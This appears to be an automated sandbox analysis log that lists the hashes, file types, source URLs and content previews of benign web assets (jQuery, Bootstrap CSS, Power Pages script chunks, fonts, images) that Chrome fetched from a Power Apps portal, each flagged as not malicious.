                                        Preview:....window.ResourceManager = {.. 'Cms_Sitemapchildren_Update_Label' : "Children", .. 'EntityGrid_Url_NotFound' : "A required service URL wasn\u0027t provided.",.. 'FileBrowser_Header_Label' : "Choose a file.",.. 'ADX_EventSchedule_AcceptableDays' : "Acceptable days",.. 'Confirm_DeleteMultiple_Entity' : "Are you sure you want to delete these records?",.. 'ADX_Blog_ShortName' : "blog",.. 'ADX_BlogPost_ShortName' : "blog post",.. 'Entity_Create_ADX_BlogPost_Label' : "Blog post",.. 'Entity_Create_ADX_Blog_Label' : "Child blog",.. 'Entity_Create_ADX_Event_Label' : "Child event",.. 'Entity_Create_ADX_CommunityForum_Label' : "Child forum",.. 'Editable_DeleteMultiple_Tooltip_Suffix_Singular' : "Child record?",.. 'Editable_DeleteMultiple_Tooltip_Suffix_Plural' : "Child records?",.. 'Entity_Create_ADX_Shortcut_Label' : "Child shortcut",.. 'ADX_BlogPostComment_ShortName' : "comment",.. 'ADX_PageComment_ShortName' : "comment",... 'Entity_Create_ADX_BlogPost_Tooltip' : "Create a new blog post",..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):170
                                        Entropy (8bit):4.4728806381946695
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0BC8C23001888849EEC4B119E1C633A4
                                        SHA1:C7A420F32B808AD95AA3F8084A567F0D398B7B87
                                        SHA-256:42A97186264C094F663D9608B0E7D75E1EB1105924E52F3F718CC54EB857986A
                                        SHA-512:A205120EB42293999D6D504E8F5B3C782128F3E0250FD1371E47395C4968A791BDDBCE89A2FA94210E15D56F036678438FB675DD2F2EDF82DA32B6788C11DBF4
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{. "PcfControlProxy": {. "library": "pcf_loader",. "remoteEntry": "/pcf_loader/remoteEntry.e629937a41.js",. "control": "./PcfControlProxy". }.}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):678
                                        Entropy (8bit):4.459663865885072
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:015B84BC105591DA9A976EEDC343F71D
                                        SHA1:D76CDA961D8EC620E748284C67972D13B4A9AED6
                                        SHA-256:55B1ADCA696762C869EC0A5A46BAB113E0E3052761B435C18A8C5DD5D07CE30A
                                        SHA-512:89C606B7B6FB1FACA99717EA06538FC49C2497C26A97C9E2273AC6F8CAD0D79C3D9B141E6E6E1AFC8C6EFDF7B4C4E22C843262927FCD417A0908738310D83320
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{. "Gallery": {. "library": "pcf_controls",. "remoteEntry": "/pcf_controls/remoteEntry.bdc09af78a.js",. "control": "./Gallery". },. "GalleryWrapped": {. "library": "pcf_controls",. "remoteEntry": "/pcf_controls/remoteEntry.bdc09af78a.js",. "control": "./GalleryWrapped". },. "SearchSummary": {. "library": "pcf_controls",. "remoteEntry": "/pcf_controls/remoteEntry.bdc09af78a.js",. "control": "./SearchSummary". },. "SearchSummaryWrapped": {. "library": "pcf_controls",. "remoteEntry": "/pcf_controls/remoteEntry.bdc09af78a.js",. "control": "./SearchSummaryWrapped". }.}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (11766), with no line terminators
                                        Category:downloaded
                                        Size (bytes):11766
                                        Entropy (8bit):4.903164552389703
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2659C6F064BBDF38AFF3A3F7D33BA256
                                        SHA1:73EA787E226F755D9F57DC637AEB5A9D506338CF
                                        SHA-256:E3A5A5E3432453A9CDCE2A02DD4D7F08037119C6A9AC545D010D3CF73768825A
                                        SHA-512:F2508AE13D0E19E3BA856F919E05FCF731A2481C13D2FF99FB7843E7CA7CEAA37BE37D07E20C18CFDFE09A4B2DB9EA196A9C179B201C37C85A9F8146FF18D173
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-style.bundle-2659c6f064.css
                                        Preview:.msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{position:absolute!important;z-index:1000;top:28px!important}html[dir=rtl] .msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{right:0!important}html[dir=ltr] .msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{left:0!important}.msos-glyph:after{font-size:9px!important}.msos-label{margin-bottom:0}.msos-caret-button:focus{outline:0}.msos-selecteditems-container:focus{outline:0}.msos-container:not(.msos-disabled){border:1px solid #949494;box-shadow:inset 0 1px 1px rgb(0 0 0 /8%);transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.msos-container:not(.msos-disabled).msos-active{border:1px solid #949494!important;box-shadow:inset 0 1px 1px rgb(0 0 0 /8%);transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.msos-container:not(.msos-disabled).msos-focused{border-color:#69c!important;outline:0;box-shadow:inset 0 1px 1px rgb
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (39862)
                                        Category:downloaded
                                        Size (bytes):977847
                                        Entropy (8bit):5.3506013175263405
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E303D5355313048BECBD7E9429825F82
                                        SHA1:4ECFDB3DCA8F4AD156D0A0F12FB2ABBB1DBF6D67
                                        SHA-256:CED5EA5C04E6DD8807FA46B2052888EB4798E557C507FC2EC75463FEE17A9AEA
                                        SHA-512:2DD6CFF9B75FE25F1000CDC54F63209D11E9E90860F8CE23A492E1AFA28A7ADDB8E5262031BFF3772174F001ABFD19A5FD655AC562E4297667C8F4DA26B71AC7
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-extended.bundle-e303d53553.js
                                        Preview:var __assign=this&&this.__assign||function(){return(__assign=Object.assign||function(e){for(var t,n=1,o=arguments.length;n<o;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("React"),require("Fela")):"function"==typeof define&&define.amd?define("ReactFela",["React","Fela"],t):"object"==typeof exports?exports.ReactFela=t(require("React"),require("Fela")):e.ReactFela=t(e.React,e.Fela)}(window,function(n,o){return function(n){var o={};function r(e){if(o[e])return o[e].exports;var t=o[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,r),t.l=!0,t.exports}return r.m=n,r.c=o,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 226 x 48, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):3331
                                        Entropy (8bit):7.927896166439245
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EF884BDEDEF280DF97A4C5604058D8DB
                                        SHA1:6F04244B51AD2409659E267D308B97E09CE9062B
                                        SHA-256:825DE044D5AC6442A094FF95099F9F67E9249A8110A2FBD57128285776632ADB
                                        SHA-512:A083381C53070B65B3B8A7A7293D5D2674D2F6EC69C0E19748823D3FDD6F527E8D3D31D311CCEF8E26FC531770F101CDAF95F23ECC990DB405B5EF48B0C91BA2
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://superyachtstbarth.sharepoint.com/_layouts/15/images/microsoft-logo.png
                                        Preview:.PNG........IHDR.......0............sRGB.........IDATx..=w....G.z..L.4fN.k\dS..._`..........r...~.F..e._.RZ.0.K.\..CB...1.{qq/..^|.G..o.......?....Or.......y~....]..V.a.mM...M.\k*H..@B`s.$"n...)!.@"b#4. !.9...7.u...hD ....T.........:EJ.4"..X........<|.pgkk+....>~.....pju1i"b.J.&!.!...=T....k..D7.....O.<.?}......./..(.`0..!.C..'.?..e..~.....l6...._.x1rmR...$|E...l.WKDH...f..... ...Y.0R....>...{...-..o........,...E../......_....eM.Q....@Q...w sp5.9..l.W)...Pq... .]..B..).../M.G.g....].V...5$<......Eb.9.....>LYAk.Z.k..b..]N%>}4a....4!S...t..d..<.8AH+.../r...._...!qt.:q..fR.:..KW.._...T...5..>.0!.hq.rbND\...XR.,2.uX..Q.b...wQ......g..X...F...~.....ikZE...UA....V.I!..]..Mm..R.....~k.VC.n..V.*B#W...\..yI.3.....2........6c....2J....,g..5O1.s.4V2.....f..K..Obf\....;.w...|.F>F>6_z..P.dU<.wVV......?.q.?&........O.>....l.S.upp....59.C_.......fJ.M.={v,......]Y_....n.?UF....v<.$..AD...p.....:$r =p...C.k.3....n.v..~.TGd!...l.W...s..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (394)
                                        Category:downloaded
                                        Size (bytes):27246
                                        Entropy (8bit):5.095039722281301
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8A7E95E7EE1EDAB2B30EF06388965C47
                                        SHA1:FA1BE4BBDA95F4DFBC5FE12D0258CAD27E9B4004
                                        SHA-256:5DC712EC1522BF27E1E40742C8B832E9269D5952932B4B0B95EDC72065938B30
                                        SHA-512:8CBA81EB182E7157B0C9EBBF8371FB47BD6C2AFA4FBDE66AFA046CF51AAF7AA6C8B273A30D695115BAF07FBACF56FC6D9EAC5F266285B4025AAF0787519A775D
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/portalbasictheme.css
                                        Preview:/**. * Code generated by Microsoft. Changes to this file are not. * supported. We recommend that you do not modify this file. Any. * change to this file will get overwritten with a theme applied using. * Site Styling panel from Power Apps Portals.. */.:root {. --portalThemeColor1: #B6B4B2;. --portalThemeColor2: #605E5C;. --portalThemeColor3: #F3F2F1;. --portalThemeColor4: #323130;. --portalThemeColor5: #F8F8F8;. --portalThemeColor6: #5C5A58;. --portalThemeColor7: #FFFFFF;. --portalThemeColor8: #000000;. --portalThemeColor9: #191817;. --portalThemeColor10: ;. --portalThemeColor11: ;. --portalThemeColor12: ;. --portalThemeOnColor1: #000000;. --portalThemeOnColor2: #FFFFFF;. --portalThemeOnColor3: #000000;. --portalThemeOnColor4: #FFFFFF;. --portalThemeOnColor5: #000000;. --portalThemeOnColor6: #FFFFFF;. --portalThemeOnColor7: #000000;. --portalThemeOnColor8: #FFFFFF;. --portalThemeOnColor9: #FFFFFF;. --portalThemeOnColor10: ;. --portalThemeOnColor11: ;. --portalTh
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32012)
                                        Category:downloaded
                                        Size (bytes):69597
                                        Entropy (8bit):5.369216080582935
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48395)
                                        Category:downloaded
                                        Size (bytes):48444
                                        Entropy (8bit):5.284267981780026
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6027D51DC3F9461C3B5AB3A1F8C5BEED
                                        SHA1:9787028F6B186F85580729694A1ED66DAE58B5F5
                                        SHA-256:C108037861ED8A7BD3CD188CC6DA3F7DC4103207B2C77B7E439F33DFA9334309
                                        SHA-512:59D2F7FA229810027D9D82AFC1FB17FE20FE5172E596C204D274B65E5CA887A6FD4F9736787EE1413ACA4F7324198183FAB2F0D41D9889D3F0902E905A14B894
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/448.462407f435.chunk.js
                                        Preview:(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[448],{9448:(t,e,r)=>{"use strict";function n(t){for(var e=arguments.length,r=Array(e>1?e-1:0),n=1;n<e;n++)r[n-1]=arguments[n];throw Error("[Immer] minified error nr: "+t+(r.length?" "+r.map((function(t){return"'"+t+"'"})).join(","):"")+". Find the full error at: https://bit.ly/3cXEKWf")}function o(t){return!!t&&!!t[V]}function i(t){var e;return!!t&&(function(t){if(!t||"object"!=typeof t)return!1;var e=Object.getPrototypeOf(t);if(null===e)return!0;var r=Object.hasOwnProperty.call(e,"constructor")&&e.constructor;return r===Object||"function"==typeof r&&Function.toString.call(r)===J}(t)||Array.isArray(t)||!!t[Y]||!!(null===(e=t.constructor)||void 0===e?void 0:e[Y])||p(t)||h(t))}function a(t,e,r){void 0===r&&(r=!1),0===u(t)?(r?Object.keys:X)(t).forEach((function(n){r&&"symbol"==typeof n||e(n,t[n],t)})):t.forEach((function(r,n){return e(n,r,t)}))}function u(t){var e=t[V];return e?e.i>3?e.i-4
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1839)
                                        Category:downloaded
                                        Size (bytes):1888
                                        Entropy (8bit):5.194556838487297
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:AA0A7FD952ECC06E88834D1E8149458E
                                        SHA1:7BE0C9471AE98D502CC641BBB73608A14F35EC9F
                                        SHA-256:B5C4610F8649585FA574EBF979D34642D092FB1D59F1291DA70425E93AAD86A7
                                        SHA-512:A54AFB31947B643E4D774EBC31A539014E016B904C0172FEAB1C3CC000228619E2D26F08ABF4BA9E1D8C179655E9197038A8828106875D0139CC9B68193DC60D
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/759.3a97bfc81c.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[759,140],{8759:(e,t,o)=>{o.r(t),o.d(t,{AnnounceProvider:()=>M,AnnounceProvider_unstable:()=>M,BackgroundAppearanceProvider:()=>g,CustomStyleHooksContext_unstable:()=>h,CustomStyleHooksProvider_unstable:()=>y,OverridesProvider_unstable:()=>p,PortalMountNodeProvider:()=>H,Provider_unstable:()=>b,ThemeClassNameProvider_unstable:()=>a,ThemeContext_unstable:()=>r,ThemeProvider_unstable:()=>u,TooltipVisibilityProvider_unstable:()=>c,useAnnounce:()=>O,useAnnounce_unstable:()=>O,useBackgroundAppearance:()=>w,useCustomStyleHook_unstable:()=>A,useFluent_unstable:()=>x,useOverrides_unstable:()=>f,usePortalMountNode:()=>S,useThemeClassName_unstable:()=>d,useTooltipVisibility_unstable:()=>C});var n=o(5041);const r=n.createContext(void 0),u=r.Provider,s=n.createContext(void 0),i="",a=s.Provider;function d(){var e;return null!==(e=n.useContext(s))&&void 0!==e?e:i}const v=n.createContext(v
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format (Version 2), TrueType, length 150516, version 770.768
                                        Category:downloaded
                                        Size (bytes):150516
                                        Entropy (8bit):7.9968634709884325
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:328A9D0F59F0EBB55CDDAC6F39995BEA
                                        SHA1:C0E6E76B4A02C34656FF2A41B671E02F2821829B
                                        SHA-256:8F06540FD77F1EFFE1E2DA8EA10CEC4A382DDA9CC6EF05D816E1D6DE444072F2
                                        SHA-512:5B12555B07818D96107E9A4F692FC6C620BA9D0FCF6029E7883C7CD375A16C88061B388CD72754C1421D4683F3EB84C314A223FD9E51B8B2E5D431FB2AFE8312
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/fonts/fa-solid-900.woff2
                                        Preview:wOF2......K...........K..........................8.$. .`..<........@..p. .w..Dp......aD.f./.Y...PUUUU5)!.1.v...*..O~.._..w..._..............K`pL.?L.v\...7../..{g..4....,.)4.....E8....0...1.....i;....s...J...57.AE.LT\6...../.}r.....L..%y.~..R....=....n.V.IqX......(.........t.D....s.}.5......u;.h.3..2...TE.'.P...8...!..r.. .`.....C..=U..[.<.....'.V.W..TR.d.$...K..X.-5N...=7.@^.>.%/..q/...}@.e.{.'S.....?...3}...`g.h[.......X@Q..J..:Ul.M...]........X.....Mw...N...\.i>]r.}.d......>.=...PXD. DB.%..DB.Y..k<.X..5Nc.K*..:.T.u%n.....g..g;.O..unw........1.o,.......A..H..m..M.,..L;.R..8M.i..JG.d.V.f......K..7..;]..<N.?...$K.d.1.95.rMI.....pq.3.Y.,q.........\x......=q.....F6...zf..It..aN...2qJ..AG.I..akoE...`........Ih..h(....k=....l..Q...$.5C48..4g..~US.:T.TB.d..[.l....s.;<...w.DQ...@.<...k...3..B.......I.{....R$......G....p.+.:..ph.F..<.O}.]....s[X..I...x.........9..${.....g..n..v.,V\@...-......V.Nf.5...c...Q.2...0.8j.Z...+.......33...!..!..C0w
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max compression, from TOPS/20, original size modulo 2^32 101839
                                        Category:downloaded
                                        Size (bytes):21716
                                        Entropy (8bit):7.985877301436584
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:01A8AD8011CAFC9DDE7FF5BDC1FEDC49
                                        SHA1:2F4B5833385687AC5F34F7300992D37A9A994FF5
                                        SHA-256:E1A467E6ECC753C947C652CAE96B369DDD0E41092F17217A40A999BC82221466
                                        SHA-512:35D9E06E9F16338F00EFF34CB6A60FC81DA7AD6F6518157D4A96590DD62CC48314DF86E126F3DB2AF2276758B524992B016C6EFA35A5573431961046E0384529
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.css
                                        Preview:...........]....n...n..t..#).PD.`.g...0...;.}.$*B..I....j..7IiS..vd..9cx....,R.Or................s.........^...O..C....J5'....8v./...3.)o..,.R......z>.O...................O....5...._>..?...S....B.........4....{..m...Qd~Y..=}..&.........J..C).U.....>........O.......g..W......%.>~W'.R...z....3..0T........{.....j...e........~;.....po..V5._..x.rQ...>..j.. .C....,>.....y.e.j...n....S...]...U..Fc........:..i...Nc.....C...~......1{...4.......7.K(.f0r..e.............L...;xZ.Sw0]....y.....e0.........S.... ..~~..Z.>...m~..Et........x.g.....{.38E....ArL.=.W..>."H.g8.S..........b}..;G.;.....p.wQ..f..<...(..U1..2GM.ou5,..0.uzw5..]..9.tdH]...H?...(.........~............9...7s....g...>......P..~.2.%.Q~..e..}..mU.Mm.q.m.d.o....(.iX...?.....<.;f..Z.....Y..a.............O.a>....S..y.n.k...+.V...?....7......;.9r9....s|.L..7...B..C#..e.33..U!=.x.........U/s....i.i.!..~.....^.._.B....'..Ujc........C..-.F..w.t..]..]..rj.W9..$.ApPK..F.~...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:assembler source, ASCII text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):32395
                                        Entropy (8bit):4.985437520840124
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FA694BC0473766A8E8F1CDEFB9007BBB
                                        SHA1:7F69530F8431FA456B9C0C02B65E7C2E197A98C2
                                        SHA-256:AB189E68B67A70C8B40043A6734C512439214A072F5F90C69860A5BA42E71880
                                        SHA-512:17A65600CB28C67994C71C18012EEC128FC64D0E71C619509DD73BE12061304E401313D3B32274CE2C151BF4468F434A781819843912C29B9BFFB3496BAFDFB7
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/theme.css
                                        Preview:/*!.. * Bootstrap v3.3.6 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */....h1.underline,..h4.underline {.. border-bottom: 1px solid #bcbcbc;.. padding-bottom: 21px;..}....@media (max-width: 767px) {.. .. .text_center-mobile {.. text-align: center;.. }..}.......btn-lg-home {.. padding: 20px 40px;.. font-size: 15px;..}.......btn-info-home {.. color: #fff;.. border-color: #fff;.. background: transparent;..}.....btn-info-home:hover {.. color: #000;.. border-color: #000;.. background: #fff;..}.....btn-info-home:active {.. color: #000;.. border-color: #000;.. background: #fff;..}.....btn-info-home:focus {.. color: #000;.. border-color: #000;.. background: #fff;..}.......breadcrumb > li a {.. color: #302ce1;.. padding: 2px 4px;..}...breadcrumb > li a:hover {.. color: #302ce1;..}.......pagination > li > a,...pagination > li > span {.. background-color: transparent;..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (45034)
                                        Category:dropped
                                        Size (bytes):45035
                                        Entropy (8bit):5.400557193761079
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                        SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                        SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                        SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (383)
                                        Category:downloaded
                                        Size (bytes):431
                                        Entropy (8bit):5.3211848705054035
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:25DFE0A5F08DAE66177D60C599904208
                                        SHA1:6888D55C9D52DF74703862C1274459D1BFCDFC69
                                        SHA-256:A3765EC0AC346488AE0E3BED0E98F5744AC56C19BBD371073195ADF8AE2F77A9
                                        SHA-512:EA218D6192FE237274E5E789B95EF848DFB261910322A2D49D624E1A4677755AF0CB15D201F2FE164451E5665D1A5658D86F0ADCC6DD039CADADB1A4BEA99626
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/90.24327273f1.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[90],{5090:(t,e,r)=>{function s(){return s=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var r=arguments[e];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(t[s]=r[s])}return t},s.apply(this,arguments)}r.d(e,{A:()=>s})}}]);.//# sourceMappingURL=90.24327273f1.chunk.js.map
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:downloaded
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (42815)
                                        Category:dropped
                                        Size (bytes):42864
                                        Entropy (8bit):5.18912803360478
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:197395E90DC9729F818EA9939E9C0F02
                                        SHA1:44AB2D06F60067EDD19EDFC7150C4D8FF144BEB2
                                        SHA-256:E82600ABB85B8F5E55BC120B8FBA82ACD57C533C97FD6B843AD31FC75A255F56
                                        SHA-512:1E4D7849F1E305BD8095BB25BE4F891C45A91E573071542A4FBE5E1FA3AB37D04CD59902781C328F04BA309F23F94DC7823A3D0CC864D9658E74C78C4E913466
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[170],{4170:(e,t,n)=>{"use strict";n.r(t),n.d(t,{ActionMethodsWithConfig:()=>Ce,Canvas:()=>G,CoreEventHandlers:()=>ge,DefaultEventHandlers:()=>Ee,DerivedCoreEventHandlers:()=>me,Editor:()=>Ae,Element:()=>W,Events:()=>xe,Frame:()=>V,NodeElement:()=>B,NodeHelpers:()=>de,NodeProvider:()=>f,NodeSelectorType:()=>X,QueryMethods:()=>ye,ROOT_NODE:()=>r.e3,connectEditor:()=>Z,connectNode:()=>ee,createTestNodes:()=>qe,createTestState:()=>Me,defaultElementProps:()=>H,deprecateCanvasComponent:()=>$,editorInitialState:()=>we,elementPropToNodeData:()=>U,expectEditorState:()=>Le,serializeNode:()=>se,useEditor:()=>K,useEditorStore:()=>Te,useEventHandler:()=>I,useNode:()=>M});var r=n(9448),o=n(1646),a=n.n(o),i=n(9541),s=n(9680),d=n.n(s),c=n(3037),u=n.n(c);const l=a().createContext(null),f=({id:e,related:t=!1,children:n})=>a().createElement(l.Provider,{value:{id:e,related:t}},n);function p(e,t){var n=Obje
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
